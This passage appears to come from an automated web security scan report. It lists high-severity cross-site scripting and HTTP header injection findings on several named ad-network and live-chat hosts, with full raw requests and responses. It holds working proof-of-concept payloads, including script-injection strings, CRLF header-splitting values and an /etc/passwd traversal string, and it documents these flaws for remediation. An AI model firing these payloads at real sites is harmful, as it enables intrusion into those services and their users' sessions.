Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p82806590=exp=2&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 4 12:13:37 2011&prad=67008629&arc=40380915&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; UID=9cc29993-80.67.74.150-1314836282

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:54:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p63514475=exp=26&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:54:37 2011&250d16de58214c9a371d551e=1&prad=348445181&arc=233006068&; expires=Fri 16-Dec-2011 00:54:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30216

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"348445181",Pid:"p63514475",Arc:"233006068",Location:
...[SNIP]...
00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&', "UID": '9cc29993-80.67.74.150-1314836282../../../../../../../../etc/passwd%009cc29993-80.67.74.150-1314836282', "ar_35525<script>alert(1)</script>f2ebf4b3f03": 'exp=1&initExp=Sat Sep 17 00:54:37 2011&recExp=Sat Sep 17 00:54:37 2011&prad=348445181&arc=233006068&', "BMX_3PC": '1', "ar_p63514475250d16deff7e44d5a47a3990": 'exp=1&initExp=Sat Sep 17 00:54:33 2
...[SNIP]...

2.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 284b8'-alert(1)-'04109d7f66c was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=284b8'-alert(1)-'04109d7f66c&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Request 2

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=28:27:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:49:38 GMT
Date: Sat, 17 Sep 2011 01:49:20 GMT
Content-Length: 2692
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c';
...[SNIP]...

2.3. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-507/d3/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-507/d3/jsc/fm.js. The payload 5969c"-alert(1)-"5ef3bafc3c0 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-507/d3/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=5969c"-alert(1)-"5ef3bafc3c0&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Request 2

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:19:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=21
Expires: Sat, 17 Sep 2011 01:49:37 GMT
Date: Sat, 17 Sep 2011 01:49:16 GMT
Content-Length: 2692
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5969c"-alert(1)-"5ef3bafc3c0,c3994%22%3b85a41f5da2f,collective728x90,c3994";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                               
...[SNIP]...

2.4. http://livechat.iadvize.com/chat_init.js [vuid cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://livechat.iadvize.com
Path:   /chat_init.js

Issue detail

The value of the vuid cookie submitted to the URL /chat_init.js is copied into the HTML document as plain text between tags at the URL /chat_init.js. The payload 2e364<script>alert(1)</script>b793934a58c was submitted in the vuid cookie. This input was returned unmodified in a subsequent request for the URL /chat_init.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/features
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c; 1821vvc=3; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%2C%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D

Request 2

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1821vvc=2; vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:08 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb793934a58c; expires=Sun, 15-Sep-2013 21:55:08 GMT; path=/
Set-Cookie: 1821_idzp=%7B%22origin_site%22%3A%22%22%2C%22origin%22%3A%22direct%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%2C%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A6%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A21936835.13%2C%22navTime%22%3A1316210108000%7D; path=/
Expires: Mon, 22 Jan 1978 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 42132

if(typeof(iAdvize) !== 'object'){
   
if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) {
   var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ];
   var newNode = docume
...[SNIP]...

       iframe.name = name;
       iframe.src = 'javascript:false';
       div.appendChild(iframe);
       form.action = 'http://livechat.iadvize.com/saveuid.php?sid=1821&vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c622e364<script>alert(1)</script>b793934a58c';
       form.method = 'POST';
       form.target = name;
       div.appendChild(form);
       form.submit();
   }, 10);
}

if(typeof(iAdvize2) === 'undefined'){
           iAdvize2 = {}
}

/*! LAB.js (LABjs :: Loading And Blockin
...[SNIP]...

3. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://2912a.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The value of the cr request parameter is copied into the Location response header. The payload d8d28%0d%0aeb92866aa30 was submitted in the cr parameter. This caused a response containing an injected HTTP header.

Request

GET /ad/l/1?last=1&ct=0&metr=0&s=b035&t=1316221067347346&adid=661886&reid=352172&arid=0&auid=&cn=defaultImpression&et=i&_cc=661886,352172,,12523.,1316221067,1&tpos=&init=1&cr=d8d28%0d%0aeb92866aa30 HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 302 Found
Set-Cookie: _uid="b139_5653128498656399883";expires=Sun, 16 Sep 2012 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g193954~1.1316221551.0,5.1316221758.0,21966.1316221551.0,21967.1316221758.0,^";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221757.58849.648140~648142~661884~661886~664345~,1316221527.58849784063c197da02440673a1ca.664345~,1316221526.784063c1d09056819c7a889b.661884~661886~,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221670.1103.1.1,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221758.28800.0.68412102,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Location: d8d28
eb92866aa30

Content-Length: 0
Date: Sat, 17 Sep 2011 01:09:17 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload b4e04%0d%0adcb62044598 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=b4e04%0d%0adcb62044598&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:b4e04
dcb62044598
,collective728x9057523';expires=Sat, 17 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=92:91:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2624
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='b4e04
dcb6
...[SNIP]...

3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 1bc99%0d%0af3d004c45 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=1bc99%0d%0af3d004c45&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=2; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 1bc99
f3d004c45
;expires=Mon, 17 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5099
Date: Sat, 17 Sep 2011 01:49:02 GMT
Connection: close



3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The value of the rurl request parameter is copied into the Location response header. The payload f8960%0d%0a9818607d76e was submitted in the rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /dmm/servlet/dmm?rurl=f8960%0d%0a9818607d76e&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000187%2C826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1986338424%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 01:49:27 GMT
X-Name: dmm-s01
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Mon, 16-Sep-2013 01:49:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 01:49:27 GMT; Path=/
Location: http://usadmm.dotomi.com/dmm/servlet/f8960
9818607d76e

Content-Length: 0
Content-Type: text/plain


4. Cross-site scripting (reflected)
There are 256 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

